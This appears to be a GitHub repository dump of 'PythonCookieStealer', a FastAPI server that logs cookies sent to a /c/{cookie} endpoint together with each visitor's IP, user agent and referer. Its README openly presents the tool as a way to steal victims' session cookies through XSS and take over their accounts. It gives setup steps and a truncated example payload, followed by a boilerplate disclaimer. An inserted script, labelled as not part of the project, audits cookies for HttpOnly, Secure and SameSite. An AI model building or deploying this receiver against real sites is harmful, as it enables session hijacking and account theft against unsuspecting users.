├── .gitignore
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── LICENSE.md
├── README.md
├── cookies.txt
├── main.py
└── requirements.txt

/.gitignore:
--------------------------------------------------------------------------------
__pycache__
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
# Contributor Code of Conduct

As a contributor to this project, we ask that you adhere to the following code of conduct:

1. Be respectful and considerate of others, regardless of their race, gender, religion, or other personal characteristics.

2. Avoid using derogatory or offensive language or behavior.

3. Stay focused on the issues at hand and avoid personal attacks or ad hominem arguments.

4. Be open to constructive feedback and willing to learn from others.

5. Respect the privacy of others and avoid sharing personal information without their consent.

6. Adhere to the project's guidelines and conventions for contributions.

7. Help create a positive and supportive community by encouraging others and offering help when needed.

We take violations of this code of conduct seriously, and reserve the right to remove contributors who engage in inappropriate behavior. By contributing to this project, you agree to abide by this code of conduct and help create a safe and welcoming environment for all members of the community.
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
# Contributing to Project

Thank you for your interest in contributing to Project! We welcome contributions from the community and appreciate any feedback or suggestions you may have.
## Submitting Issues

If you encounter any issues with Project, please submit them through the project's [GitHub Issues](https://github.com/TheWation/PythonCookieStealer/issues) page. Please include as much detail as possible, including the steps to reproduce the issue and any error messages or logs.

## Contributing Code

If you would like to contribute code to Project, please follow these steps:

1. Fork the project repository to your own GitHub account.

2. Create a new branch for your changes.

3. Make your changes and commit them to your branch.

4. Push your branch to your forked repository.

5. Submit a pull request from your branch to the Project repository.

Please make sure to include a detailed description of your changes and why you think they are necessary. We also ask that you follow the project's coding standards and conventions.

Thank you for your contribution!
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
Copyright (c) 2012-2022 Scott Chacon and others

Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:

The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Python Cookie Stealer
The Python cookie stealer is a tool that can be used in penetration testing and XSS attacks to steal browser cookies from victims. The tool works by setting up a server that listens for incoming requests carrying a cookie value in the URL path. When a request is received, the tool logs information about the request, including the date and time, client IP address, user agent, referer, and cookie value, to a file.

This tool can be used by attackers to steal sensitive information, such as session tokens and authentication credentials, from unsuspecting users. By stealing a user's browser cookies, an attacker can gain unauthorized access to the user's account and perform actions on their behalf.

## Usage

1. Clone the Python Cookie Stealer project:

```bash
git clone https://github.com/TheWation/PythonCookieStealer
```

2. Install Python and FastAPI on your machine if you haven't already. You can download the latest version of Python from the official website (https://www.python.org/downloads/) and install FastAPI using pip:

```bash
pip install fastapi
```

3. Install uvicorn, a lightning-fast ASGI server, using pip:

```bash
pip install uvicorn
```

4. Create a new directory for your project and navigate into it using a terminal or command prompt.

5. Create a new file called main.py and copy the FastAPI code into it.

6. Start the FastAPI server by running the following command in the terminal or command prompt:

```bash
uvicorn main:app --reload
```

7. In your web browser, visit http://localhost:8000/c/your-cookie-value, replacing your-cookie-value with the value of the cookie that you want to log. For example, if the cookie value is ABC123, you would visit http://localhost:8000/c/ABC123.

8. The server will log the date and time, client IP address, user agent, referer, and cookie value to the cookies.txt file in the project directory:

```
[+] Date: 2022/10/03 15:30:45
[+] IP: 127.0.0.1
[+] UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
[+] Referer: http://localhost:8000/
[+] Cookies: ABC123
---
```

9. The server also returns a response with status code 200 if the request was successful, or status code 500 if there was an error writing to the file.

10. You can repeat step 7 with different cookie values to log additional data to the file.

11. To stop the server, press CTRL+C in the terminal where it is running.

## Example Payload
```
https://pentest.target/?name=
```

## Disclaimer
For educational purposes only. Do not use for illegal activities. Use at your own risk. By using this tool, you agree to comply with all applicable laws and regulations. Unauthorized use is strictly prohibited. Always obtain permission before using this tool. No warranties.

## License

`WebSecurityVision` is made with ♥ by [Wation](https://github.com/TheWation) and it's released under the MIT license.
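The theft the README describes only works when script running in the victim's page can read the cookie; the browser withholds HttpOnly cookies from script, so they never reach an endpoint like `/c/{cookie}`. As an added example (not part of the PythonCookieStealer project), this stdlib-only audit checks `Set-Cookie` headers for the attributes that blunt the attack: HttpOnly, Secure and a restrictive SameSite. The session-name hints and sample headers are constructed for the example.

```python
"""Audit Set-Cookie headers for the attributes that blunt XSS cookie theft.

Added example, not part of the PythonCookieStealer project. A cookie set
without HttpOnly is readable by page script and can be handed to an endpoint
like /c/{cookie}; HttpOnly makes the browser withhold it from script. The
name hints and sample headers below are constructed.
"""
from typing import Dict, List, Tuple

# Constructed: cookie names that usually carry session or auth material.
SESSION_NAME_HINTS = ("session", "sid", "auth", "token", "jwt")


def parse_set_cookie(header_value: str) -> Tuple[str, Dict[str, str]]:
    """Split one Set-Cookie value into (cookie name, lower-cased attributes)."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0].strip()
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()  # attribute names are case-insensitive
    return name, attrs


def missing_defenses(header_value: str) -> List[str]:
    """Return the defensive attributes a Set-Cookie header lacks (empty if hardened)."""
    _, attrs = parse_set_cookie(header_value)
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")  # exposed to document.cookie, hence to injected script
    if "secure" not in attrs:
        missing.append("Secure")    # also sent over plaintext HTTP
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("SameSite")  # absent or None: attached to cross-site requests
    return missing


def audit_session_cookies(headers: List[str]) -> Dict[str, List[str]]:
    """Map each session-like cookie name to its missing defenses."""
    findings = {}
    for header in headers:
        name, _ = parse_set_cookie(header)
        if any(hint in name.lower() for hint in SESSION_NAME_HINTS):
            findings[name] = missing_defenses(header)
    return findings


# Constructed samples: a weak session cookie and its hardened form.
WEAK_HEADER = "sessionid=ABC123; Path=/"
HARDENED_HEADER = "sessionid=ABC123; Path=/; HttpOnly; Secure; SameSite=Lax"
```

Run `audit_session_cookies` over the `Set-Cookie` headers of a login response; an empty list for the session cookie means the value is out of reach of the exfiltration shown above.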
--------------------------------------------------------------------------------
/cookies.txt:
--------------------------------------------------------------------------------
[+] Date: 2022/10/03 15:30:45
[+] IP: 127.0.0.1
[+] UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
[+] Referer: http://localhost:8000/
[+] Cookies: ABC123
---
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
# __ __ ______ ______ __ ______ __ __
# /\ \ _ \ \ /\ __ \ /\__ _\ /\ \ /\ __ \ /\ "-.\ \
# \ \ \/ ".\ \ \ \ __ \ \/_/\ \/ \ \ \ \ \ \/\ \ \ \ \-. \
# \ \__/".~\_\ \ \_\ \_\ \ \_\ \ \_\ \ \_____\ \ \_\\"\_\
# \/_/ \/_/ \/_/\/_/ \/_/ \/_/ \/_____/ \/_/ \/_/
# https://github.com/TheWation/PythonCookieStealer

from fastapi import FastAPI, Request
from datetime import datetime

app = FastAPI()


@app.get("/c/{cookie}")
def read_root(cookie: str, request: Request):
    # Append one record per request to cookies.txt in the working directory.
    # The "cookie" path segment is whatever the client placed in the URL;
    # an unhandled write error surfaces as FastAPI's default 500 response.
    with open('cookies.txt', 'a') as cookie_file:
        time_str = datetime.now().strftime("%Y/%m/%d %H:%M:%S")
        client_host = request.client.host
        # Header lookups are case-insensitive and yield None when absent.
        user_agent = request.headers.get("User-Agent")
        referer = request.headers.get("Referer")
        cookie_file.write(f'[+] Date: {time_str}\n[+] IP: {client_host}\n[+] UserAgent: {user_agent}\n[+] Referer: {referer}\n[+] Cookies: {cookie}\n---\n')
    return {"status": 200}
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
fastapi
pydantic
uvicorn
--------------------------------------------------------------------------------